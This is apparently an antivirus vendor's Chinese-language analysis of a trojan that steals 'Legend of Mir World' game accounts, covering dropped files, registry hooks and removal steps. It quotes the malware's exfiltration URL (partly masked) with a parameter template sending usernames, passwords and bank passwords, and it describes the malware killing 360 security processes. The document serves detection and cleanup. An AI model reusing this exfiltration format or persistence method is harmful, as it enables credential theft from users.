Trojan/Win32.OnLineGames.bkzg[GameThief]分析

一、 病毒标签：
病毒名称： Trojan/Win32.OnLineGames.bkzg[GameThief]
病毒类型： 木马
文件 MD5： D8FA90F2A769C994081321D805E91C8E
公开范围： 完全公开
危害等级： 3
文件长度： 15,301 字节
感染系统： Windows98以上版本
开发工具： Microsoft Visual C++ 6.0
加壳类型： FSG 2.0

二、 病毒描述：
该病毒为盗取传奇世界游戏账号类木马，病毒运行后获取随即八位字母，依次为病毒名，以nls为扩展名衍生病毒文件到%Windir%\fonts目录下，加载dll文件并调用dll中的功能模块，执行注册dll，修改注册表添加hook项等操作；遍历进程列表，检测进程中调用了woool.dat文件的进程并将之关闭。为命令行创建线程删除病毒本体。Dll文件被加载后重新加载自身，检测360相关进程成并将之关闭。检测传奇世界进程。发现后捕获用户输入，发送到指定的收取页面。

三、 行为分析：
本地行为:
1、文件运行后会释放以下文件
%Windir%\Fonts\gzcqsj01.dat                        42 字节
%Windir%\Fonts\pddwrwks.nls                        49,152 字节[8位随机文件名]
2、新增注册表
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BF8912E-DE56-4948-83E8-90D2C3F5EB3E}\InprocServer32]
注册表值: "@"
类型： REG_SZ
值: "C:\WINDOWS\fonts\pddwrwks.nls"
描述：为动态链接库文件注册ID
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
注册表值: "{6BF8912E-DE56-4948-83E8-90D2C3F5EB3E}"
类型： REG_SZ
值: ""
描述：添加hook用以截获用户的相关信息

网络行为:
收信地址：
http://www.md5ss**.com/CS/B51/05ndisaeas/post.asp
回传参数：
格式1：
http://www.md5ss**.com/CS/B51/05ndisaeas/post.asp?gametype=cqsj&para=%s&%ver=0316&zone=%s&server=%s&name=%s&password=%s&secopass=%s&nickname=%s&lord=%s&level=%s&money=%u&goldcoin=%u&yb=%u&equipment=%s&bag=%s&mb=%d&mbtime=%d&hardinfo=%s&norefreshcode=%s
格式2：
http://www.md5ss**.com/CS/B51/05ndisaeas/post.asp?gametype=cqsj&name=%s&password=%s&zone=%s&server=%s&bankpass=%s&level=%s&mb=%d&norefreshcode=%s

注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32，windows95/98/me中默认的安装路径是C:\Windows\System，windowsXP中默认的安装路径是C:\Windows\System32。
%Temp%  = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
    %Windir%\                           WINDODWS所在目录
%DriveLetter%\                        逻辑驱动器根目录
%ProgramFiles%\                        系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\        当前用户文档根目录

四、 清除方案：
1、使用安天防线可彻底清除此病毒(推荐)。
2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。
(1) 恢复修改的注册表
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BF8912E-DE56-4948-83E8-90D2C3F5EB3E}\InprocServer32]
注册表值: "@"
类型： REG_SZ
值: "C:\WINDOWS\fonts\pddwrwks.nls"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
注册表值: "{6BF8912E-DE56-4948-83E8-90D2C3F5EB3E}"
类型： REG_SZ
值: ""
(2) 重新启动计算机，删除病毒文件
%Windir%\Fonts\gzcqsj01.dat
%Windir%\Fonts\pddwrwks.nls[随即8位文件名]